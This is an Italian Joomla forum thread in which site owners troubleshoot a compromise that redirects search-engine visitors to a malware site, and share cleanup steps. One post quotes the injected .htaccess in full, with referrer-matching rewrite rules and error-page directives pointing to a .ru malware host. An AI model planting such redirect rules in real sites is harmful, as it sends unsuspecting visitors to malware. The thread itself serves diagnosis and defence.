Joomla.it Forum
Non solo Joomla... => Sezione dedicata ai Server => : robinmaster 27 Apr 2012, 18:03:46
-
Buona sera a tutti. Spero di postare nella sezione corretta.
Ho un grossissimo problema con joomla e google. Nei risultati organici e in adwords quando si clicca sul mio sito si viene reindirizzati ad una pagina che indirizza ad un sito con un virus.
Purtroppo non riesco a trovare se benedetta pagina malefica o quello che sia..
Una cosa che vedo tramite i log di apache è l'indirizzo corretto dell'articolo..è il seguente..
http://www.google.it/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCIQFjAA&url=http%3A%2F%2Fwww.resinestrutturate.it%2F&ei=n7-aT-jgKomH4gSSyoGEDw&usg=AFQjCNEtux3wO86J96LxfJ_J25oi9LTVuQ
In google webmaster tool la scansione da errore su questa pagina
index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D54%26Itemid%3D43%26lang%3Dit
Credo che sia identica a quella riportata dal server apache.
Il problema è che non lo trovo... Qualcuno ha qualche idea???
Grazie.
-
Questa è il link che non funziona.. Che rimanda a file del re indirizzamento non corretto..
http://www.resinestrutturate.it/index.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D54%26Itemid%3D43%26lang%3Dit,404,,04/12/11,Non trovato
-
... a me non va nemmeno il sito senza nessun uri http://www.resinestrutturate.it/
M.
-
Ho trovato... Forse.. probabilmente hanno alterato il file .htacces.. Adesso sto ri uploadado il sito..
A breve vediamo se avevo ragione..
-
se è così, come è probabile, fai una bella scansione fuori linea dei pc che usi per accedere all'amministrazione del sito con un buon antivirus, meglio se + di uno.
M.
-
Non credo che il mac abbia virus. ;)
-
non è "il mac" è il browser
M.
-
CAVOLO ancora.. Prova a vedere.. Vai su google e cerca resinestrutturate...
Vieni diretto ad un altro link
-
hai cambiato le password ftp?
io continuo a sostenere che è un pw stealing tramite il browser... ma non sono gesù :)
inoltre spesso vengono inserite backdoor, prova a cercare in locale con un text finder se trovi qualche eval(
http://php.net/manual/en/function.eval.php
M.
-
Andando sulla home page direttamente ho caricato il codice..
Ho trovato questo:
/templates/rt_hivemind_j15/rokzoom/rokzoom.css (http://www.resinestrutturate.it/templates/rt_hivemind_j15/rokzoom/rokzoom.css)
Cliccando sul link diretto ti porta al sito incriminato nel redirect..
www.resinestrutturate.it/templates/rt_hivemind_j15/rokzoom/rokzoom.css (http://www.resinestrutturate.it/templates/rt_hivemind_j15/rokzoom/rokzoom.css)
Controlla... Ma la cosa strana è che non riesco a capire da dove lo carica ste codice...
-
ummhh no, non arrivi nel sito la redirezione avviene prima, direi ancora nell'htaccess... perchè non lo disabiliti un po' finchè non risolvi? ... togli il sef e il rewrite dalla configurazione.
M.
-
da dove?
-
O meglio con che permessi lo setto?? adesso è 444
-
Ok adesso funzia.. Ho cancellato tutti i file htaccess.
Vorrei capire come ha fatto qualcuno a modificare i file....
Bha.. Grazie per aiuto..
-
Niente da fare.. Continua a scrivere i file htaccess.
Come risolvo qualche idea??
-
Ecco qui il file .htaccess
RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://san-agater.ru/easy?9 [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://san-agater.ru/easy?9 [R=301,L][/size]ErrorDocument 400 http://san-agater.ru/easy?9 ErrorDocument 401 http://san-agater.ru/easy?9 ErrorDocument 403 http://san-agater.ru/easy?9 ErrorDocument 404 http://san-agater.ru/easy?9 ErrorDocument 500 http://san-agater.ru/easy?9
-
hai cambiato le password ftp?
io continuo a sostenere che è un pw stealing tramite il browser... ma non sono gesù :)
inoltre spesso vengono inserite backdoor, prova a cercare in locale con un text finder se trovi qualche eval(
http://php.net/manual/en/function.eval.php
M.
-
Scusa ma hai risolto?
Ho anche io lo sesso problema.. hai risolto??
Non riesco a capire come fa, .. io sono un pistola e non ci capisco tanto..
Aiutooooo
-
ma hai letto i post? ... e se si, cosa hai fatto?
M.
-
stesso problema, se lo levo lo riscrive, oppure modifica l htaccess che c'è, ho reinstyallato i broweser, joomla, cambiato ftp e admin come password, controllato i permessi. Da dove cavolo modifica ed anche i miei reindirezzamenti sono .ru, è una brutta falla questa ed è joomla 2.5. Help
-
Io ho cambiato accesso ftp, ho provato a lasciare il suo file ma modificando il redirect ( reindirizzandolo al al mio :))) ma si è accorge che è stato modificato ( penso prenda l'ora della modifica) e me lo riscrive!!!!
Cavolo non sono riuscito a capire che cavolo sta succedendo e d ho tutto aggiornato !! Anche io la versione 2.5 !!
-
non puoi fare .. metà...
le scansioni antivirus le hai fatte?
hai cercato trasferendo i files in locale, se hanno iniettato backdoor?
M.
copio anche quì:
se a qualcuno interessa capire di più:
http://blog.sucuri.net/2011/05/understanding-htaccess-attacks-part-1.html
e quì i malware e come vengono distribuiti
http://blog.sucuri.net/2012/04/sucuri-sitecheck-web-malware-distribution-march-2012.html
-
! Anche io la versione 2.5 !!
------------------------------------------
ma sei sicuro?
dai tuoi headers vedo qs: <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
M
-
non puoi fare .. metà...
le scansioni antivirus le hai fatte?
hai cercato trasferendo i files in locale, se hanno iniettato backdoor?
M.
copio anche quì:
se a qualcuno interessa capire di più:
http://blog.sucuri.net/2011/05/understanding-htaccess-attacks-part-1.html (http://blog.sucuri.net/2011/05/understanding-htaccess-attacks-part-1.html)
e quì i malware e come vengono distribuiti
http://blog.sucuri.net/2012/04/sucuri-sitecheck-web-malware-distribution-march-2012.html (http://blog.sucuri.net/2012/04/sucuri-sitecheck-web-malware-distribution-march-2012.html)
Scusa ma io sono proprio un pivello,dopo che ho trasferito i files in locale come faccio a vedee se mi hanno iniettato backdoor?
Grazie e scusa la mia ignoranza..
-
...anche questo lo avevo già scritto.....
----------------------------------------
inoltre spesso vengono inserite backdoor, prova a cercare in locale con un text finder se trovi qualche eval(
------------------------------------------
M.
-
Allora ragazzi, per il momento pare di aver risolto, ma continuerò a monitorare il sito per tutto il giorno per esserne sicuro, ecco la procedura che dovrete seguire.
1) Scaricate due o tre antivirus diversi, soprattutto quelli specializzati per il malware, lanciateli e ripulite il pc, cancellate da locale eventuali copie di joomla perchè potrebbero essere infette e potrebbero riuscire ad infettarsi anche da locale a locale.
2) Dovete cancellare tutto ciò che avete nella root del sito, ogni file e cartella, mi dispiace ma è l'unica, il codice si ficca dappertutto, non avete alternativa. Quindi dovete rimontare un joomla pulito, appena scaricato da joomla.it, e ripeto non dovete sovrascrivere il nuovo joomla pulito ma cancellare il vecchio e poi copiare il nuovo, in modo da evitare che resti qualcosa. Quindi dovete agganciare il nuovo joomla al vecchio database, non dovrebbe crearvi problemi ma perderete le estensioni, meglio così, reinstallatele come nuiove, per disinstallare quelle che gia avete e che non si disinstalleranno dovete agire direttamente sul database, cancellarle e reinstallarle, state attenti se non siete esperti rischiate di danneggiare il database.
3) Lanciate questo scan (http://sitecheck.sucuri.net/scanner/) e vedete si va da il sito pulito e tenetelo sott'occhio per un bel pò.
4) Utilizzate il sito e controlalte sempre con lo scan, io sono arrivato a questo punto e mi da tutto pulito, se l'infezione riparte allora c'è da pensare che possa essere collegata al database e li sono cazzi.
-
azz! ... finalmente qualcuno che ha capito... e si che non è complicato :)
allora c'è da pensare che possa essere collegata al database
-------------------------------------------------------------------------------------
...guarda... per esperienza ne ho visti veramente pochi... capita certo, ma anche quì non è difficile, basta scaricare il db in un file sql sul desktop e da li fare una ricerca di "cose strane" tipo tag script, funzioni, insomma cose che in un db difficilmente si trovano. (a meno dei soliti pasticci per inserire script negli articoli).
Poi mi fa piacere che hai dedicato del tempo se non altro a scorrere gli articoli linkati, insegnano veramente molto.
Anche gli editor vanno aggiornati... è una mia impressione però J non pone molta attenzione all'integrazione di questi, infatti è possibile l'accesso diretto a molti files tra cui il moxieplayer.swf al quale è possibile appendere un url per far caricare un filmato se la cosa non viene gestita è banale caricare un flv "malevolo" attraverso altri siti... fino a Dicembre era possibile ora bisogna inventarsi qualcosa di un po' più complicato :)
M.
-
Scusate , ma io ad oggi sono 12 ore che ho il sito su.... ho seguito le indicazioni di robinmaster !!!
Il file infetto risiede inella cartella temp ed ha estensione .php
Basta cancellare tutti i file nella cartella tmp, eliminare i file .htaccess cretai e io per ora ho risolto !!!
Almeno spero !!!
Buona fortuna a tutti !!!
Volevo cmq sapere come cavolo è successo !!!
-
@ secestato, dimenticavo ..ed è importante: cambia le credenziali di ftp e db ... quelle probabilmente le possiede.
se è un automatismo avrà una latenza di qualche giorno, poi ci riproverà.
Non ti dico di aggiornare perchè se hai dovuto rimettere le estensioni penso tu abbia preso le ultime versioni.
M.
-
;) ho cambiato l'accesso ftp.. per il DB non penso sia riuscito a bucarlo.. solo quelo che volevo capire è come ha fatto ad bentrare !! Penso più ad una falla di J2.5...
Speriamoche non si riaffacci più questo problema .. è stata la prima volta ma mi sono cag.... sotto :(
Grazie a tutto il forum per l'interessamento..
-
Penso più ad una falla di J2.5...
------------------------------------------
io penso tu abbia seguito questo post un po' a modo tuo per questo non capisci ancora....
ma poi i problemi li hai sul tuo sito? quello linkato nel tuo profilo?
M.
-
si www.fotovideoplay.it ... ma perchè mi dici che ho seguito il post a modo mio...?
Io sono ignorante in materia, ma ho risolto il problema con l'aiuto di uno che mi ha parlato in maniera semplice...scusa ma con le tue parole mi hai creato solo confusione.. sempre perchè io "non sono all'altezza" e mi diletto a smanettare.. cercando di imparare.. ma mi hai riempito di belle parole senza darmi un valido aiuto terra terra.. lo vedi dal mio log che sono un pivello..dovresti usare parole e spiegazioni che possano aiutare i pistola come me....
Se non ci fosi riuscito probabilmente mi sarei affidato ad un professionista... del web !!
Grazie cmq perchè ho sempre imparato qualcosa di novo da questa esperienza..
-
nessun problema anzi, se ti ho confuso con le mie soluzioni quando ne esisteva una più semplice, mi scuso
M.
-
Grazie Mau :D
Comunque si, penso che sia un automatismo, ne sono quasi sicuro, per la frequenza con cui ricreava htaccess non dovrebbe essere altrimenti.
Sto monitorando, effettivamente non ho ancora cambiato credenziali ftp e database, anche se è molto piu probabile che il codice acquisisica quelle del database che può prelevare da configuration.php mentre è molto piu' improbabile che acquisisica i dati ftp (ovviamente se non sono stati settati su configuration.php durante l'installazione di joomla o successivamente) cosa che a questo punto sconsiglierei di fare per sicurezza.
C'è la possibilità che possa ancora essere annidato nel database e re infetterà il sito non appena l'articolo che contiene il contenuto malware sarà aperto da qualche utente.
Non voglio additare estensioni, ma sono arrivato alla conclusione che chrono comments sia insicuro, è preferibile utilizzare j comments.
Un altro consiglio che vorrei dare, se non avete particolari necessità, disattivate dalle preferenze lato server motori come pearl e altra roba, mantenete solo apache attivo, in questo modo riducete le probabilità che codici di vario genere vengano messi in funzione, anche se questo particolare malware che credo sia molto diffuso utilizzi esclusivamente php.
Fino ad adesso sta andando tutto bene, il sito è clean da 2 giorni ormai, l'automatismo dovrebbe agire a livello di ore, tranne che abbia intervalli non regolare con pause ogni tanto di piu giorni, cosa molto malefica perchè destabilizza chi pensava di aver risolto.
Non abbassate la guardia, l'ultima tappa di questo processo deve assolutamente essere l'analisi del database, eccovi un consiglio per come agire:
1 - scaricate il database in sql sul desktop, analizzatelo con un software che ricerca malware, ne trovate decine sulla rete scrivendo su google scan malware for site, alcuni analizzando solo siti, ad alcuni potete sottoporre anche file ed è meglio usare servizi predisposti per siti che analizzano anche file in quanto piu specializzati al web.
2 - fatto questo, non e detto che il servizio trovi il malware, allora fate una ricerca all'interno del file cercando come parole chiave .ru, dato che la maggior parte di questo codice malevolo rimanda a siti malware con estensione .ru e di solito il codice infetto (quello ad esempio da me tovato su htaccess non riesce a nascondere tale indirizzo ma lo esibisce apertamente), questo potrebbe farvi risparmiare tempo nel caso in cui possedete database molto grandi.
Se trovate codice malevolo nel database rimuovetelo manualmente stando attenti a non compromettere il database, e se lo trovate, allora molto probabilmente il problema sta o nell utilizzo di qualche gestore di commenti non aggiornato come vecchie versioni di chrono comments, o dovete rivedere i permessi di registrazione e utilizzo dei vari utenti, un altra cosa che potete fare e cercare ed eliminare utenti registrati sospetti, soprattutto da author in su, li riconoscete perchè di solito sono registrati da automatismi e possiedono nomi ed e mail strani e difficilmente veri.
-
AGGIORNAMENTO IMPORTANTE
Ok ragazzi, se avete problemi di re inderizzamento a siti malware con estensione .ru, modifica di htaccess eccetera come da discussione, è ufficiale, il problema è anche nel database.
Ho trovato codice strano con estensione .ru in parte delle tabelle del database, negli articoli, e in numerosi commenti chrono comments.
Se non agite sul database AVRETE NUOVAMENTE L'INFEZIONE non appena il codice sarà visualizzato da qualche utente che apre quello specifico articolo o commento.
Correggo quanto sopra, non c'è bisogno di scaricare il database in sql, se volete potete farlo per maggiore sicurezza, vi basterà co0munqu utilizzare il cerca nelle tabelle del database, cercate .ru, eliminate tutte le corrispondenze trovate, articoli e commenti, se volete essere piu percisi scaricate in sql e agite riga per riga ma io consiglio la rimozione degli articoli infetti.
Se agite solo nei files di joomla risolverete solo per un pò, passaerà un giorno, una settimana un mese, riavrete l'infezione.
Fatto ciò agite sui settaggi dei gestori dei commenti, inibite l'html, aggiornate le estensioni, evitate se possibile chrono comments e optate per j comments.
Se non ripulite il database riavrete l'infezione.